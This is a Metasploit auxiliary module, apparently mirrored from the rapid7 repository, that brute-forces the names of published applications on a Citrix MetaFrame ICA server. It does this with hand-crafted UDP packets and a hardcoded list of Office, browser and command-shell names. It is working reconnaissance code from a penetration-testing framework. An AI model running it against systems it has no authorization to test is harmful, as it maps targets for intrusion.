Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/citrix_published_bruteforce.rb
19593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',

14
        'Description' => %q{

15
          This module attempts to brute force program names within the Citrix

16
          Metaframe ICA server.

17
        },

18
        'Author' => [ 'aushack' ],

19
        'References' => [

20
          [ 'OSVDB', '50617' ],

21
          [ 'BID', '5817' ]

22
        ],

23
        'Notes' => {

24
          'Reliability' => UNKNOWN_RELIABILITY,

25
          'Stability' => UNKNOWN_STABILITY,

26
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

27
        }

28
      )

29
    )

30


31
    register_options(

32
      [

33
        Opt::RPORT(1604),

34
      ]

35
    )

36
  end

37


38
  def autofilter

39
    false

40
  end

41


42
  def run

43
    connect_udp

44


45
    print_status("Attempting to contact Citrix ICA service...")

46


47
    # Client NetBIOS hostname. This works fine >:)

48
    client = Rex::Text.rand_text_alphanumeric(8)

49


50
    # Server hello packet

51
    client_connect =

52
      "\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" +

53
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

54


55
    # Server hello response

56
    server_response =

57
      "\x30\x00\x02\x31\x02\xfd\xa8\xe3\x02\x00\x06\x44"

58


59
    applications = [

60
      'TEST',

61
      'NOTEPAD',

62
      'ACROBAT READER',

63
      'ACROBAR',

64
      'EXPLORER',

65
      'WORD',

66
      'WORD2K',

67
      'WORDXP',

68
      'WORD2K3',

69
      'WORD2K7',

70
      'WORD 2000',

71
      'WORD XP',

72
      'WORD 2003',

73
      'WORD 2007',

74
      'WORD2000',

75
      'WORD2003',

76
      'WORD2007',

77
      'EXCEL',

78
      'EXCEL2K',

79
      'EXCELXP',

80
      'EXCEL2K3',

81
      'EXCEL2K7',

82
      'EXCEL 2000',

83
      'EXCEL XP',

84
      'EXCEL 2003',

85
      'EXCEL 2007',

86
      'EXCEL2000',

87
      'EXCEL2003',

88
      'EXCEL2007',

89
      'ACCESS',

90
      'ACCESS2K',

91
      'ACCESSXP',

92
      'ACCESS2K3',

93
      'ACCESS2K7',

94
      'ACCESS 2000',

95
      'ACCESS XP',

96
      'ACCESS 2003',

97
      'ACCESS 2007',

98
      'ACCESS2000',

99
      'ACCESS2003',

100
      'ACCESS2007',

101
      'POWERPOINT',

102
      'POWERPOINT2K',

103
      'POWERPOINTXP',

104
      'POWERPOINT2K3',

105
      'POWERPOINT2K7',

106
      'POWERPOINT 2000',

107
      'POWERPOINT XP',

108
      'POWERPOINT 2003',

109
      'POWERPOINT 2007',

110
      'POWERPOINT2000',

111
      'POWERPOINT2003',

112
      'POWERPOINT2007',

113
      'OUTLOOK',

114
      'OUTLOOKXP',

115
      'OUTLOOK2K',

116
      'OUTLOOK2K3',

117
      'OUTLOOK2K7',

118
      'OUTLOOK 2000',

119
      'OUTLOOK XP',

120
      'OUTLOOK 2003',

121
      'OUTLOOK 2007',

122
      'OUTLOOK2000',

123
      'OUTLOOK2003',

124
      'OUTLOOK2007',

125
      'LOTUS',

126
      'LOTUS NOTES',

127
      'INTERNETEXPLORER',

128
      'IE',

129
      'IEXPLORER',

130
      'FIREFOX',

131
      'FIREFOX 3',

132
      'NETSCAPE',

133
      'NETSCAPE7',

134
      'NETSCAPE6',

135
      'MAIL',

136
      'EMAIL',

137
      'E-MAIL',

138
      'INTERNET',

139
      'CMD',

140
      'COMMAND',

141
    ]

142


143
    # Citrix is publishing this application

144
    application_valid =

145
      "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44"

146
    # Application not found / published

147
    application_invalid =

148
      "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44"

149


150
    udp_sock.put(client_connect)

151
    res = udp_sock.get(3)

152


153
    if (res[0, server_response.length] == server_response)

154
      print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")

155


156
      applications.each do |application|

157
        # Create the packet

158
        packet = [52 + application.length].pack('C')

159
        packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00"

160
        packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00"

161
        packet << [39 + application.length].pack('C')

162
        packet << "\x00\x00\x00\x00\x00"

163
        packet << application

164
        packet << "\x00\x01\x00\x04\x00"

165
        packet << client

166
        packet << "\x00"

167


168
        udp_sock.put(packet)

169
        res = udp_sock.get(3)

170


171
        if (res[0, application_valid.length] == application_valid)

172
          print_status("Found: #{application}")

173
        end

174


175
        if (res[0, application_invalid.length] == application_invalid)

176
          print_error("NOT Found: #{application}")

177
        end

178
      end

179


180
    else

181
      print_error("Server did not respond.")

182
    end

183


184
    disconnect_udp

185
  end

186
end

187


188